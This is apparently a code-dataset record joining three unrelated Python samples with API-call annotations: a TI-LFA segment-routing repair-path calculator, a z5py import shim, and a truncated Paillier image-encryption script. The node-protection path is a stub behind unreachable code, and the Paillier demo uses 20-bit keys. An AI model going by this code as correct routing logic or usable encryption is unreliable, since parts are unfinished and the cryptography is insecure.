raise Exception(
f"Link {edge} adjacency SID is not an int, can't run TI-LFA"
)
adj_sids.append(graph.edges[edge]["adj_sid"])
if len(set(adj_sids)) < len(adj_sids):
raise Exception(
"Links found with non-unique adjacency SIDs: "
f"{[sid for sid in adj_sids if adj_sids.count(sid) > 1]}"
)
def draw(self, graph, outdir, topology):
"""
Loop over the generated topologies and render them as diagram files.
:param networkx.Graph graph: NetworkX graph object
:param str outdir: String of the root output directory path
:param dict topology: Topology paths dict
:return bool True: True if all diagrams rendered otherwise False
:rtype: bool
"""
self.diagram.gen_sub_dirs(graph, outdir, self.path_types, topology)
for src, dst in [
(s, d) for d in graph.nodes for s in graph.nodes if s != d
]:
for path_type in self.path_types:
if path_type not in topology[src][dst]:
continue
if len(topology[src][dst][path_type]) < 1:
continue
tilfa_graph = graph.copy()
# Highlight the failed first-hop link as red
for path in topology[src][dst]["spf_metric"]:
tilfa_graph = self.diagram.highlight_fh_link(
"red",
tilfa_graph,
path,
)
# Highlight the failed first-hop node(s) as red
if path_type == "tilfas_node":
for path in topology[src][dst]["spf_metric"]:
tilfa_graph = self.diagram.highlight_fh_node(
"red",
tilfa_graph,
path,
)
for tilfa in topology[src][dst][path_type]:
# Highlight the path(s) from src to the PQ node(s)
for s_p_path in tilfa[0]:
print(f"s_p_path: {s_p_path}")
tilfa_graph = self.diagram.highlight_links(
"purple", tilfa_graph, s_p_path
)
tilfa_graph = self.diagram.highlight_nodes(
"purple", tilfa_graph, s_p_path
)
# Highlight the path(s) from the PQ node(s) to dst
for q_d_path in tilfa[1]:
print(f"q_d_path: {q_d_path}")
tilfa_graph = self.diagram.highlight_links(
"green", tilfa_graph, q_d_path
)
tilfa_graph = self.diagram.highlight_nodes(
"green", tilfa_graph, q_d_path
)
tilfa_graph = self.diagram.highlight_src_dst(
"lightblue", dst, tilfa_graph, src
)
# Add labels to links showing their cost
tilfa_graph = self.diagram.label_link_weights(tilfa_graph)
tilfa_graph = self.diagram.label_link_add_adjsid(tilfa_graph)
tilfa_graph = self.diagram.label_node_id(tilfa_graph)
tilfa_graph = self.diagram.label_node_add_nodesid(tilfa_graph)
self.diagram.gen_diagram(
(src + "_" + dst + "_" + path_type),
tilfa_graph,
os.path.join(outdir, src, path_type),
)
def gen_ep_space(self, dst, f_type, graph, src):
"""
Return a list of nodes in src's Extended P-space which avoid resource X
        :param str dst: Dst node in "graph" to calculate EP-space not via X
        :param str f_type: Failure type to protect against, "link" or "node"
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" to calculate EP-space from
:return ep_space: List of nodes in src's EP-space with respect to X
:rtype: list
"""
"""
TI-LFA Text:
The Extended P-space P'(R,X) of a node R w.r.t. a resource X is the
set of nodes that are reachable from R or a neighbor of R, without
passing through X.
"""
if f_type == "link":
ep_space = self.gen_link_p_space(dst, graph, src)
elif f_type == "node":
ep_space = self.gen_node_p_space(dst, graph, src)
else:
raise Exception(f"Unrecognised EP-space type {f_type}")
for nei in graph.neighbors(src):
if nei == dst:
continue
if f_type == "link":
n_p_space = self.gen_link_p_space(dst, graph, nei)
elif f_type == "node":
n_p_space = self.gen_node_p_space(dst, graph, nei)
else:
raise Exception(f"Unrecognised EP-space type {f_type}")
if src in n_p_space:
n_p_space.remove(src)
for ep_node in n_p_space:
"""
Skip EP-nodes which have the pre-failure first-hop link(s) from src
to dst in the pre-failure path(s) from src to EP-node:
"""
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fh_links = [(path[0], path[1]) for path in s_d_paths]
s_ep_paths = self.spf.gen_metric_paths(
dst=ep_node, graph=graph, src=src
)
s_ep_links = [
(path[idx], path[idx + 1])
for path in s_ep_paths
for idx in range(0, len(path) - 1)
]
overlap = [
link for link in s_ep_links if link in s_d_fh_links
]
if overlap:
if self.debug > 1:
print(
f"Skipping link EP-space node {ep_node} due "
f"to overlap:\n"
f"{s_ep_links},{ep_node}\n"
f"{s_d_fh_links},{dst}"
)
continue
if ep_node not in ep_space:
ep_space.append(ep_node)
return ep_space
def gen_link_p_space(self, dst, graph, src):
"""
Return a list of nodes in src's P-space relevant to the first-hop
link(s) towards dst.
:param str dst: Node in "graph" to calculate P-space to, avoiding S-F
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" which must avoid S-F link to Dst
:return p_space: List of nodes in src's P-space with respect to S-F
:rtype: list
"""
"""
TI-LFA Text:
The P-space P(R,X) of a node R w.r.t. a resource X (e.g. a link S-F,
a node F, or a SRLG) is the set of nodes that are reachable from R
without passing through X. It is the set of nodes that are not
downstream of X in SPT_old(R).
"""
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fh_links = [(path[0], path[1]) for path in s_d_paths]
if self.debug > 1:
print(
f"Checking for link protecting P-nodes of {src} not via "
f"link(s): {s_d_fh_links}"
)
p_space = []
for p_node in graph.nodes:
if p_node == src or p_node == dst:
continue
s_p_paths = self.spf.gen_metric_paths(
dst=p_node, graph=graph, src=src
)
"""
Skip P-nodes which have the pre-failure first-hop link(s) from src
to dst in the pre-failure path(s) from src to P-node:
"""
s_p_links = [
(path[idx], path[idx + 1])
for path in s_p_paths
for idx in range(0, len(path) - 1)
]
overlap = [
link for link in s_p_links if link in s_d_fh_links
]
if overlap:
if self.debug > 1:
print(
f"Skipping link protecting P-space node {p_node} due "
f"to overlap:\n"
f"{s_p_links},{p_node}\n"
f"{s_d_fh_links},{dst}"
)
continue
p_space.append(p_node)
return p_space
def gen_link_pq_space(self, dst, graph, link_q_space, src):
"""
Return the list of Q-space nodes which are link protecting against S-F
from S to D.
:param str dst: Destination node name in "graph"
:param networkx.Graph graph: NetworkX graph object
:param list link_q_space: List of Q-space nodes in "graph" relative to
D not via S-F
:param str src: Source node name in "graph"
:return link_pq_nodes: List of nodes in D's Q-space and in post-SPF
:rtype: list
"""
"""
TI-LFA Text:
4.2. Q-Space property computation for a link S-F, over post-convergence
paths
We want to determine which nodes on the post-convergence path from
the PLR to the destination D are in the Q-Space of destination D
w.r.t. link S-F.
This can be found by intersecting the post-convergence path to D,
assuming the failure of S-F, with Q(D, S-F).
"""
link_pq_space = []
# Get the pre-converge path(s) to D
pre_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
pre_s_d_fh_links = [(src, path[1]) for path in pre_s_d_paths]
# Remove the pre-convergence first-hop link(s) from the graph
tmp_g = graph.copy()
for fh_link in pre_s_d_fh_links:
tmp_g.remove_edge(*fh_link)
# Re-calculate the path(s) to D in the failure state (post-convergence)
post_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=tmp_g, src=src)
for post_s_d_path in post_s_d_paths:
for q_node in link_q_space: # Q-space doesn't include src or dst
if q_node in post_s_d_path:
link_pq_space.append(q_node)
return link_pq_space
def gen_link_q_space(self, dst, graph, src):
"""
Return a list of nodes in dst's Q-space which avoid link(s) S-F.
:param str dst: Dest node in "graph" to calculate Q-space for
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" relevant to S-F link
:return q_space: List of nodes in dst's Q-space with respect to S-F
:rtype: list
"""
"""
TI-LFA Text:
The Q-Space Q(D,X) of a destination node D w.r.t. a resource X is the
set of nodes which do not use X to reach D in the initial state of
the network. In other words, it is the set of nodes which have D in
their P-space w.r.t. S-F, F, or a set of links adjacent to S).
"""
q_space = []
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fh_links = [(src, path[1]) for path in s_d_paths]
for q_node in graph.nodes:
if q_node == src or q_node == dst:
continue
q_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=q_node)
"""
Skip Q-nodes which have the pre-failure first-hop link(s) from src
            to dst in the pre-failure path(s) from the Q-node to dst:
"""
q_d_links = [
(path[idx], path[idx + 1])
for path in q_d_paths
for idx in range(0, len(path) - 1)
]
overlap = [
link for link in q_d_links if link in s_d_fh_links
]
if overlap:
if self.debug > 1:
print(
f"Skipping link protecting Q-space node {q_node} due "
f"to overlap:\n"
f"{q_d_links}\n"
f"{s_d_fh_links}"
)
continue
q_space.append(q_node)
return q_space
def gen_metric_link_tilfas(self, dst, graph, link_ep_space, link_pq_space, link_q_space, src):
"""
Return all link protecting TI-LFAs paths from src to dst.
Do this by returning all equal-cost explicit paths (based on metric,
not hop count) between "src" and "dst" nodes in "graph" that satisfy
the rules below.
:param str dst: Destination node name in "graph"
:param networkx.Graph graph: NetworkX graph object
:param list link_ep_space: EP- or P-space of Src node
:param list link_q_space: List of nodes in D's Q-space
:param list link_pq_space: List of nodes in D's Q-Space in post-SPF
:param str src: Source node name in "graph"
:return tilfa_paths: list of dict of TI-LFA paths
:rtype: list
"""
tilfa_paths = []
lfa_cost = 0
lfa_p_cost = 0
"""
TI-LFA Text:
5.1. FRR path using a direct neighbor
When a direct neighbor is in P(S,X) and Q(D,x) and on the post-
convergence path, the outgoing interface is set to that neighbor and
the repair segment list MUST be empty.
This is comparable to a post-convergence LFA FRR repair.
"""
for nei in graph.neighbors(src):
if nei in link_pq_space:
"""
Check that the neighbour/pq-node isn't reached via the same
failed fist hop link(s) toward dst:
"""
pre_s_pq_paths = self.spf.gen_metric_paths(dst=nei, graph=graph, src=src)
pre_s_pq_fh_links = [(src, path[1]) for path in pre_s_pq_paths]
pre_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
pre_s_d_fh_links = [(src, path[1]) for path in pre_s_d_paths]
overlap = [
fh_link for fh_link in pre_s_d_fh_links if fh_link in pre_s_pq_fh_links
]
if overlap:
if self.debug > 1:
print(
f"Skipping directly connected neighbour {nei} due "
f"to overlap:\n"
f"{pre_s_pq_fh_links},{nei}\n"
f"{pre_s_d_fh_links},{dst}"
)
continue
if self.debug > 1:
print(
f"Directly connected neighbour {nei} is link "
f"protecting from {src} to {dst}"
)
n_d_paths = self.spf.gen_metric_paths(
dst=dst, graph=graph, src=nei
)
cost = self.spf.gen_path_cost(graph, [src] + n_d_paths[0])
if cost < lfa_cost or lfa_cost == 0:
lfa_cost = cost
tilfa_paths = [
(
[[src, nei]],
n_d_paths,
[[]]
)
]
if self.debug > 0:
print(f"TI-LFA 5.1.1: {tilfa_paths}")
elif cost == lfa_cost:
tilfa_paths.append(
([[src, nei]], [n_d_path for n_d_path in n_d_paths], [[]])
)
if self.debug > 0:
print(f"TI-LFA 5.1.2: {tilfa_paths}")
"""
TI-LFA Text:
5.2. FRR path using a PQ node
When a remote node R is in P(S,X) and Q(D,x) and on the post-
convergence path, the repair list MUST be made of a single node
segment to R and the outgoing interface MUST be set to the outgoing
interface used to reach R.
This is comparable to a post-convergence RLFA repair tunnel.
"""
for p_node in graph.nodes:
if p_node == src or p_node == dst:
continue
if p_node not in graph.neighbors(src):
if p_node in link_pq_space:
if self.debug > 1:
print(
f"Remote P-node {p_node} is link protecting from "
f"from {src} to {dst}"
)
# Get the pre-converge path(s) to D
pre_s_p_paths = self.spf.gen_metric_paths(dst=p_node, graph=graph, src=src)
pre_s_p_fh_links = [(src, path[1]) for path in pre_s_p_paths]
                    # Remove the pre-convergence first-hop link(s) from the graph
tmp_g = graph.copy()
for fh_link in pre_s_p_fh_links:
tmp_g.remove_edge(*fh_link)
                    # Re-calculate the path(s) to the P-node in the failure state (post-convergence)
post_s_p_paths = self.spf.gen_metric_paths(dst=p_node, graph=tmp_g, src=src)
p_d_paths = self.spf.gen_metric_paths(
dst=dst, graph=tmp_g, src=p_node
)
"""
Check if this path has a lower cost from src to dst
than the current TI-LFA path(s)
"""
cost = self.spf.gen_path_cost(tmp_g, post_s_p_paths[0] + p_d_paths[0][1:])
if cost < lfa_cost or lfa_cost == 0:
lfa_cost = cost
tilfa_paths = [
(
post_s_p_paths,
p_d_paths,
[graph.nodes[p_node]["node_sid"]]
)
]
if self.debug > 0:
print(f"TI-LFA 5.2.1: {tilfa_paths}")
# If it has the same cost...
elif cost == lfa_cost:
"""
Check if this path is the same as an existing TI-LFA,
but using a different repair node along the same path.
Prefer scenario 1 over scenario 2...
Scenario 1: [ src -> R1 ] + [ R2 -> R3 -> dst ]
Scenario 2: [ src -> R1 -> R2 ] + [ R3 -> dst ]
This hopefully reduces the required segment stack and
thus reduces the MTU required and likelihood for
excessive MPLS label push operations.
"""
for tilfa in tilfa_paths:
if tilfa[0][-1] != post_s_p_paths[0][-1]:
cost = self.spf.gen_path_cost(tmp_g, post_s_p_paths[0])
this_lfa = self.spf.gen_path_cost(tmp_g, tilfa[0][0]) ########## Can any of the paths to p_node be different cost?
if cost < this_lfa:
tilfa_paths = [
(
post_s_p_paths,
p_d_paths,
[graph.nodes[p_node]["node_sid"]]
)
]
if self.debug > 0:
print(f"TI-LFA 5.2.2: {tilfa_paths}")
break
# Else it's an ECMP path with the same cost to p_node
else:
tilfa_paths.append (
(
post_s_p_paths,
p_d_paths,
[graph.nodes[p_node]["node_sid"]]
)
)
if self.debug > 0:
print(f"TI-LFA 5.2.3: {tilfa_paths}")
"""
TI-LFA Text:
5.3. FRR path using a P node and Q node that are adjacent
When a node P is in P(S,X) and a node Q is in Q(D,x) and both are on
the post-convergence path and both are adjacent to each other, the
repair list MUST be made of two segments: A node segment to P (to be
processed first), followed by an adjacency segment from P to Q.
This is comparable to a post-convergence DLFA repair tunnel.
"""
for p_node in graph.nodes:
if p_node == src or p_node == dst:
continue
if p_node in link_ep_space:
if p_node not in link_pq_space:
for q_node in graph.neighbors(p_node):
if q_node == src or q_node == dst:
continue
if q_node in link_q_space:
if self.debug > 1:
print(
f"P-Node {p_node} is neighbour of "
f"{q_node}, which together are link "
f"protecting from {src} to {dst}"
)
s_p_paths = self.spf.gen_metric_paths(
dst=p_node, graph=graph, src=src
)
q_d_paths = self.spf.gen_metric_paths(
dst=dst, graph=graph, src=q_node
)
cost = self.spf.gen_path_cost(
graph, [s_p_paths[0] + q_d_paths[0][1:]]
)
if cost < lfa_cost or lfa_cost == 0:
lfa_cost = cost
tilfa_paths = [
(
[s_p_path + [q_node] for s_p_path in s_p_paths],
q_d_paths,
[
graph.nodes[p_node]["node_sid"],
graph.edges[(p_node, q_node)]["adj_sid"]
]
)
]
if self.debug > 0:
print(f"TI-LFA 5.3.1: {tilfa_paths}")
elif cost == lfa_cost:
tilfa_paths.append(
(
[s_p_path + [q_node] for s_p_path in s_p_paths],
q_d_paths,
[
graph.nodes[p_node]["node_sid"],
graph.edges[(p_node, q_node)]["adj_sid"]
]
)
)
if self.debug > 0:
print(f"TI-LFA 5.3.2: {tilfa_paths}")
"""
5.4. Connecting distant P and Q nodes along post-convergence paths
In some cases, there is no adjacent P and Q node along the post-
convergence path. However, the PLR can perform additional
computations to compute a list of segments that represent a loop-free
path from P to Q. How these computations are done is out of scope of
this document.
---
Thanks you bastards. We shall calculate any P to Q paths. If some
exist, calculate the Source to P paths, then append them together.
"""
# Get the pre-converge path(s) to D
pre_s_p_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
pre_s_p_fh_links = [(src, path[1]) for path in pre_s_p_paths]
        # Remove the pre-convergence first-hop link(s) from the graph
tmp_g = graph.copy()
for fh_link in pre_s_p_fh_links:
tmp_g.remove_edge(*fh_link)
"""
For each ep node calculate the post convergence path to each pq node.
Build a list of all these paths to get the lowest cost one.
"""
ep_nodes = [node for node in link_ep_space if node not in link_pq_space]
pq_nodes = [node for node in link_pq_space if node not in link_ep_space]
p_q_paths = []
p_q_cost = 0
for ep in ep_nodes:
for pq in pq_nodes:
post_p_q_paths = self.spf.gen_metric_paths(dst=pq, graph=tmp_g, src=ep)
if len(post_p_q_paths[0]) > 0:
for path in post_p_q_paths:
cost = self.spf.gen_path_cost(tmp_g, path)
if cost < p_q_cost or p_q_cost == 0:
p_q_paths = [path]
p_q_cost = cost
elif cost == p_q_cost:
if path not in p_q_paths:
p_q_paths.append(path)
if p_q_paths:
# If we found p to q paths, append them to s to p paths
s_q_paths = []
for p_q_path in p_q_paths:
p = p_q_path[0]
s_p_paths = self.spf.gen_metric_paths(dst=p, graph=tmp_g, src=src)
for s_p_path in s_p_paths:
s_q_paths.append(s_p_path + p_q_path[1:])
for s_q_path in s_q_paths:
cost = self.spf.gen_path_cost(tmp_g, s_q_path)
if cost < lfa_cost or lfa_cost == 0:
if self.debug > 1:
print(
f"Remote P & Q nodes in {s_q_path} are link "
f"protecting from {src} to {dst}"
)
q = s_q_path[-1]
q_d_paths = self.spf.gen_metric_paths(dst=dst, graph=tmp_g, src=q)
lfa_cost = cost
tilfa_paths = [
(
[s_q_path],
q_d_paths,
[
self.paths_adj_sids(tmp_g, [s_q_path])
]
)
]
if self.debug > 0:
print(f"TI-LFA 5.4.1: {tilfa_paths}")
elif cost == lfa_cost:
if self.debug > 1:
print(
f"Remote P & Q nodes in {s_q_path} are link "
f"protecting from {src} to {dst}"
)
q = s_q_path[-1]
q_d_paths = self.spf.gen_metric_paths(dst=dst, graph=tmp_g, src=q)
tilfa_paths.append(
(
[s_q_path],
q_d_paths,
[
self.paths_adj_sids(tmp_g, [s_q_path])
]
)
)
if self.debug > 0:
print(f"TI-LFA 5.4.2: {tilfa_paths}")
return tilfa_paths
def gen_metric_node_tilfas(self, dst, graph, node_ep_space, node_pq_space, src):
"""
Return all node protecting rLFAs.
        Do this by keeping only repair paths whose pre-convergence best
        path(s) from the repair tunnel end-point(s) do not pass through any of
        the first-hop node(s) of the pre-convergence best-path(s) from src to
        dst. Currently a stub which returns an empty list.
        :param str dst: Destination node name in "graph"
        :param networkx.Graph graph: NetworkX graph object
        :param list node_ep_space: EP- or P-space of the src node w.r.t. node failure
        :param list node_pq_space: List of node protecting PQ-space nodes in "graph"
:param str src: Source node name in "graph"
:return tilfas_node: List of tuples of equal-cost node protecting TI-LFAs to dst
:rtype: list
"""
tilfas_node = []
return tilfas_node
def gen_metric_paths(self, dst, graph, src):
"""
Return all TI-LFA paths between the "src" and "dst" nodes in "graph",
based on link metric (not hop count), which provide link and node
protection. Returned are all TI-LFA paths in a dict, keyed by type (link
or node), the key values are lists of tuples containing the path to
the P node and path from P to D.
:param str dst: Destination node name in "graph"
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node name in "graph"
:return tilfa_paths: Dict with list(s) of tuples
:rtype: list
"""
tilfas = {}
if self.debug > 0:
print(f"Calculating TI-LFA paths from {src} to {dst}")
tilfas = {
"tilfas_link": [],
"tilfas_node": []
}
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
# There are no paths between this src,dst pair
if not s_d_paths:
return tilfas
"""
TI-LFA Text:
5. TI-LFA Repair path
The TI-LFA repair path (RP) consists of an outgoing interface and a
list of segments (repair list (RL)) to insert on the SR header. The
repair list encodes the explicit post-convergence path to the
destination, which avoids the protected resource X and, at the same
time, is guaranteed to be loop-free irrespective of the state of FIBs
along the nodes belonging to the explicit path.
The TI-LFA repair path is found by intersecting P(S,X) and Q(D,X)
with the post-convergence path to D and computing the explicit SR-
based path EP(P, Q) from P to Q when these nodes are not adjacent
along the post convergence path. The TI-LFA repair list is expressed
generally as (Node_SID(P), EP(P, Q)).
"""
if self.ep_space:
link_ep_space = self.gen_ep_space(dst, "link", graph, src)
node_ep_space = self.gen_ep_space(dst, "node", graph, src)
if self.debug > 0:
print(f"link_ep_space: {link_ep_space}")
print(f"node_ep_space: {node_ep_space}")
else:
link_p_space = self.gen_link_p_space(dst, graph, src)
node_p_space = self.gen_node_p_space(dst, graph, src)
if self.debug > 0:
print(f"link_p_space: {link_p_space}")
print(f"node_p_space: {node_p_space}")
link_q_space = self.gen_link_q_space(dst, graph, src)
node_q_space = self.gen_node_q_space(dst, graph, src)
if self.debug > 0:
print(f"link_q_space: {link_q_space}")
print(f"node_q_space: {node_q_space}")
link_pq_space = self.gen_link_pq_space(dst, graph, link_q_space, src)
node_pq_space = self.gen_node_pq_space(dst, graph, node_q_space, src)
if self.debug > 0:
print(f"link_pq_space: {link_pq_space}")
print(f"node_pq_space: {node_pq_space}")
if self.ep_space:
link_tilfas = self.gen_metric_link_tilfas(dst, graph, link_ep_space, link_pq_space, link_q_space, src)
else:
link_tilfas = self.gen_metric_link_tilfas(dst, graph, link_p_space, link_pq_space, link_q_space, src)
if self.debug > 0:
print(f"link_tilfas: {link_tilfas}")
tilfas["tilfas_link"] = link_tilfas
return tilfas
############################
if self.ep_space:
node_tilfas = self.gen_metric_node_tilfas(dst, graph, node_ep_space, node_pq_space, src)
else:
node_tilfas = self.gen_metric_node_tilfas(dst, graph, node_p_space, node_pq_space, src)
if self.debug > 0:
print(f"node_tilfas: {node_tilfas}")
tilfas["tilfas_node"] = node_tilfas
return tilfas
def gen_node_p_space(self, dst, graph, src):
"""
Return a list of nodes in src's P-space relevant to the first-hop
nodes(s) towards dst.
:param str dst: Node in "graph" to calculate P-space to, avoiding F
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" which must avoid F node to Dst
:return p_space: List of nodes in src's P-space with respect to F
:rtype: list
"""
"""
TI-LFA Text:
The P-space P(R,X) of a node R w.r.t. a resource X (e.g. a link S-F,
a node F, or a SRLG) is the set of nodes that are reachable from R
without passing through X. It is the set of nodes that are not
downstream of X in SPT_old(R).
"""
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fhs = [path[1] for path in s_d_paths]
if self.debug > 1:
print(
f"Checking for node protecting P-space nodes of {src} not via "
f"first-hop(s): {s_d_fhs}"
)
p_space = []
for p_node in graph.nodes:
# Exclude nodes which are a first-hop towards dst:
if p_node == src or p_node == dst:
continue
if p_node in s_d_fhs:
if self.debug > 1:
print(
f"Skipping node protecting P-space node {p_node} "
f"because it is a first-hop(s) towards {dst}: "
f"{s_d_fhs}"
)
continue
s_p_paths = self.spf.gen_metric_paths(
dst=p_node, graph=graph, src=src
)
"""
            Check if any of the src->p_node path(s) contain any of the
first-hop(s) from src->dst, those are the nodes we want to avoid.
"""
overlap = [
fh for fh in s_d_fhs for s_p_path in s_p_paths if fh in s_p_path
]
if overlap:
if self.debug > 1:
print(
f"Skipping node protecting P-space node {p_node}, "
f"path(s) from {src} to {p_node} overlap with "
f"first-hop(s) in path(s) from {src} to {dst}: "
f"{s_p_paths}"
)
continue
p_space.append(p_node)
return p_space
def gen_node_pq_space(self, dst, graph, node_q_space, src):
"""
Return the list of Q-space nodes which are node protecting against F
from S to D.
:param str dst: Destination node name in "graph"
:param networkx.Graph graph: NetworkX graph object
:param list node_q_space: List of Q-space nodes in "graph" relative to
D not via F
:param str src: Source node name in "graph"
:return node_pq_space: List of nodes in D's Q-space and in post-SPF
:rtype: list
"""
"""
TI-LFA Text:
4.4. Q-Space property computation for a node F, over post-convergence
paths
We want to determine which nodes on the post-convergence from the PLR
to the destination D are in the Q-Space of destination D w.r.t. node
F.
This can be found by intersecting the post-convergence path to D,
assuming the failure of F, with Q(D, F).
"""
node_pq_space = []
# Get the pre-converge path(s) to D and remove the first-hop node(s)
pre_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
pre_s_d_fh_nodes = [path[1] for path in pre_s_d_paths]
# There are no node protecting paths for a directly connected neighbour
for fh_node in pre_s_d_fh_nodes:
if fh_node in graph.neighbors(src):
return node_pq_space
tmp_g = graph.copy()
for fh_node in pre_s_d_fh_nodes:
tmp_g.remove_node(fh_node)
# Recalculate the path(s) to D in the failure state (post-convergence)
post_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=tmp_g, src=src)
for post_s_d_path in post_s_d_paths:
for q_node in node_q_space:
if q_node in post_s_d_path:
node_pq_space.append(q_node)
return node_pq_space
def gen_node_q_space(self, dst, graph, src):
"""
Return a list of nodes in dst's Q-space which avoid node(s) F.
:param str dst: Dest node in "graph" to calculate Q-space for
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" relevant to F node
:return q_space: List of nodes in dst's Q-space with respect to F
:rtype: list
"""
"""
TI-LFA Text:
The Q-Space Q(D,X) of a destination node D w.r.t. a resource X is the
set of nodes which do not use X to reach D in the initial state of
the network. In other words, it is the set of nodes which have D in
their P-space w.r.t. S-F, F, or a set of links adjacent to S).
"""
q_space = []
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fhs = [path[1] for path in s_d_paths]
for q_node in graph.nodes:
if q_node == src or q_node == dst:
continue
q_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=q_node)
overlap = [
s_d_fh for s_d_fh in s_d_fhs for q_d_path in q_d_paths if s_d_fh in q_d_path
]
if overlap:
if self.debug > 1:
print(
f"Skipping node protecting Q-Space node {q_node}, "
f"path to {dst} overlaps with hop(s) in path(s) from "
f"{src} toward {dst}: {q_d_paths}"
)
continue
q_space.append(q_node)
return q_space
def init_topo(self, graph, topo):
"""
Create empty dict keys for all possible paths this class can generate
:return None:
:rtype: None
"""
for src in graph.nodes:
for dst in graph.nodes:
if src == dst:
continue
for path_type in self.path_types:
if path_type not in topo[src][dst]:
topo[src][dst][path_type] = []
def paths_adj_sids(self, graph, paths):
"""
Return lists of adj SIDs that will steer along the explicit path
:param networkx.Graph graph: NetworkX graph object
:param list paths: List of list of nodes that form the explicit path(s)
:return adj_sids: List of adj SIDs along path
:rtype: list of lists
"""
adj_sids = []
for path in paths:
sids = []
for idx, node in enumerate(path):
if idx < (len(path) - 1):
sids.append(graph.edges[(node, path[idx + 1])]["adj_sid"])
adj_sids.append(sids)
if self.debug > 1:
print(f"path_adj_sids: {adj_sids}")
return adj_sids
|
[
"os.path.join",
"diagram.Diagram",
"spf.spf"
] |
[((643, 659), 'diagram.Diagram', 'Diagram', ([], {'debug': '(2)'}), '(debug=2)\n', (650, 659), False, 'from diagram import Diagram\n'), ((769, 790), 'spf.spf', 'spf', ([], {'debug': 'self.debug'}), '(debug=self.debug)\n', (772, 790), False, 'from spf import spf\n'), ((5838, 5874), 'os.path.join', 'os.path.join', (['outdir', 'src', 'path_type'], {}), '(outdir, src, path_type)\n', (5850, 5874), False, 'import os\n')]
|
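The P-space and Q-space membership tests that the tilfa class above describes at length can be illustrated with a small stand-alone networkx example. The toy topology and the avoids_link helper are illustrative assumptions, not part of the module:

import networkx as nx

# Toy weighted topology; the protected resource is the link S-F.
G = nx.Graph()
G.add_weighted_edges_from([
    ("S", "F", 1), ("S", "A", 1), ("A", "B", 1),
    ("B", "D", 1), ("F", "D", 1),
])
protected = ("S", "F")

def avoids_link(graph, src, dst, link):
    """True if no shortest path from src to dst traverses the protected link."""
    for path in nx.all_shortest_paths(graph, src, dst, weight="weight"):
        hops = list(zip(path, path[1:]))
        if link in hops or tuple(reversed(link)) in hops:
            return False
    return True

src_node, dst_node = "S", "D"
# P-space of S w.r.t. S-F: nodes S reaches without using S-F.
p_space = [n for n in G.nodes if n not in (src_node, dst_node)
           and avoids_link(G, src_node, n, protected)]
# Q-space of D w.r.t. S-F: nodes that reach D without using S-F.
q_space = [n for n in G.nodes if n not in (src_node, dst_node)
           and avoids_link(G, n, dst_node, protected)]
print("P-space:", p_space)   # A and B: reachable from S without S-F
print("Q-space:", q_space)   # F, A and B: each reaches D without S-F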
from __future__ import print_function
import logging
import traceback
import sys
logger = logging.getLogger(__name__)
class NoSuchModule(object):
def __init__(self, name):
self.__name = name
self.__traceback_str = traceback.format_tb(sys.exc_info()[2])
errtype, value = sys.exc_info()[:2]
self.__exception = errtype(value)
def __getattr__(self, item):
raise self.__exception
try:
import z5py
except ImportError:
z5py = NoSuchModule('z5py')
|
[
"logging.getLogger",
"sys.exc_info"
] |
[((92, 119), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (109, 119), False, 'import logging\n'), ((302, 316), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (314, 316), False, 'import sys\n'), ((258, 272), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (270, 272), False, 'import sys\n')]
|
import numpy as np
from PIL import Image
from paillier import *
import sys
from matplotlib import pyplot as plt
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class main:
def __main__(self):
self.imagepath = None
self.c_image = None
self.image = None
self.is_image_loaded = False
self.is_encrypted = False
self.pail = paillier()
self.priv, self.pub = self.pail.generate_keypair(20)
def start(self):
pass
def nothing():
pail = paillier()
image = pail.open_image('simple.png')
priv, pub = pail.generate_keypair(20)
c_image = pail.encrypt_image(pub,image)
#c_image = pail.multiply_by_const(pub, c_image, 2)
#c_image = pail.swap_colors(pub, c_image, 'red', 'green')
#c_image = pail.flip_image(pub, c_image)
#c_image = pail.mirroring_image(pub, c_image)
#p_image = pail.increase_color(pub, c_image, "red", 100)
#c_image = pail.brightness(pub,c_image, 40)
d_image = pail.decrypt_image(priv, pub, c_image)
pail.save_image(d_image)
if __name__ == '__main__':
pail = paillier()
original = pail.open_image(sys.argv[1])
priv, pub = pail.generate_keypair(20)
c_image = pail.encrypt_image(pub, original)
print("Enter help for options..")
while(True):
a = input(bcolors.OKCYAN+"(paillier)#> "+bcolors.ENDC)
try:
inputs = a.strip().split()
if(inputs[0] == 'brightness'):
c_image = pail.brightness(pub,c_image, int(inputs[1]))
elif(inputs[0] == 'color'):
c_image = pail.increase_color(pub, c_image, inputs[1], int(inputs[2]))
elif(inputs[0] == 'mirror'):
c_image = pail.mirroring_image(pub, c_image)
elif(inputs[0] == 'flip'):
c_image = pail.flip_image(pub, c_image)
elif(inputs[0] == 'swap'):
c_image = pail.swap_colors(pub, c_image, inputs[1] , inputs[2] )
elif(inputs[0] == 'multiply'):
c_image = pail.multiply_by_const(pub, c_image, 2)
elif(inputs[0] == 'print'):
print(c_image)
